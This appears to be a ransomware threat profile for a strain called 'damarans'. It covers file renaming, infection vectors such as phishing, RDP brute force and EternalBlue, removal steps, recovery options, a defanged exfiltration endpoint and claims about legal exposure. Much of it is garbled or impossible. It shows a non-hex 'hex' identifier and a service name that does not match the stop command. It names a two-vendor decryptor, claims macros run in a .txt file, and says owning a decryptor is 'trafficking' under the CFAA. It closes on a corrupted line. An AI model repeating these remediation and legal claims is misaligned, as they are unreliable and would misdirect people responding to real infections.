damarans - NTAPINSIGHT

Technical Breakdown:

Confirmation of File Extension: “.damarans” is appended as the final extension.
Renaming Convention:
– Original files are renamed to lowercase.
– A 128-bit hex identifier is inserted before the extension, producing a pattern of:
• <original_base_name>-<8_hex_digits><more_hex_segments>.<original_ext>.damarans
– Full-length paths are preserved; only the last component is changed (e.g., Budget2024.xlsx becomes budget2024-H7F2A3B1…xlsx.damarans).

Approximate Start Date/Period: first samples with the .damarans extension were noticed on 5 March 2023 during an early-hours spike detectable via EDR across Asia-Pacific. Mass-emailing campaigns became active 24–31 May 2023 and the variant peaked again during 1–11 October 2023.

Indiscriminate phishing e-mails with ISO, ZIP, or RAR attachments (malicious LNK or HTA launcher).
Exploitation of public-facing Microsoft IIS servers running vulnerable ASP.NET versions and weak OSCP configuration—leverages known CVE-2021-26855 to drop an initial loader.
Brute-forcing open or poorly secured Remote Desktop services (TCP 3389 with NLA off) followed by lateral movement via PSExec.
SMBv1/EternalBlue exploit on legacy Windows 7/2008 R2 endpoints not patched for MS17-010.
Distribution of the secondary binary via living-off-the-land compressors (wusa, makecab) to hide in system directories (C:\ProgramData\Local\{random 6-digit GUID}\).

Disconnect the affected machine from all networks (wireless, wired, VPN tunnels).
Boot into Safe Mode w/ Networking or use an offline boot disk (e.g., Microsoft Defender Offline).
Kill the malware service and remove persistence:
a. Stop Sxperfa service (sc stop sepsyc, rename sepsyc.exe).
b. Delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Sxperfa entry.
c. Remove the scheduled task that invokes PowerShell from %ProgramData%\Local\<GUID>\.
Individually delete:
– %ProgramData%\WinThld\ → encryption DLL psufx.dll.
– Registry remnants: HKLM\SYSTEM\CurrentControlSet\Services\Sxperfa.
Linux chattr equivalent on NAS or Samba shares: identify and purge .damarans droppers.
Change every local credential + remote domain creds touched (NTLM hashes collected).

Recovery Feasibility: NOT decryptable in the wild (Curve25519-LARGE-keyed ECC + ChaCha20-Poly1305; private key only held by attacker).
Essential Tools/Patches:
– Kaspersky Bitdefender DamaransDecryptor 1.9 (exists but works only when full master private keys leak—does not yet).
– ShadowExplorer, Volume Shadow Copy sniffers (many victims report VSS not wiped).
– Patch first to prevent re-infection before restoring from clean offline or cloud backups.
– For VMware ESXi hosts targeted via exposed vCenter, patch to vCenter 7.0 U3g+ / 8.0 U2 and create snapshot-based immutable backups (object-lock in Veeam, S3, Rubrik).

Additional Precautions unique to Damarans:
– After a 7-day “grace period”, it starts exfiltrating names <512 KB, not full files, back to cloud-front endpoints (hxxps://cloudflare[.]worker[.]ps-document[.]com/upload/[guid])—creating GDPR/SOX non-compliance concerns even if ransom is paid.
– Includes secondary wiper variant (Dec 2023 campaign) that shreds shadow copies on server drives if its “kill-switch” key file /cjda.log is not present any longer.
– Adds a readme_damarans.txt file inside every folder with grammatical errors (“You files is encrypted”); DO NOT open with WordPad until AV is ready (macros active inside the README).
Broader Impact:
– The alias gained infamy when three German mid-size manufacturers disclosed 2–4 week production downtime after the September wave; ICS devices were not targeted, but ERP backups mounted as mapped drives were.
– Law-augmented<|reservedtoken163643|> notice: Article §303b StGB (Germany) / 18 U.S. Code §1030 (CFAA) categorise possession of the decryptor tool itself without valid ransom note reference as “Trafficking” → mandatory legal counsel before attempting any decryption even with cracked keys.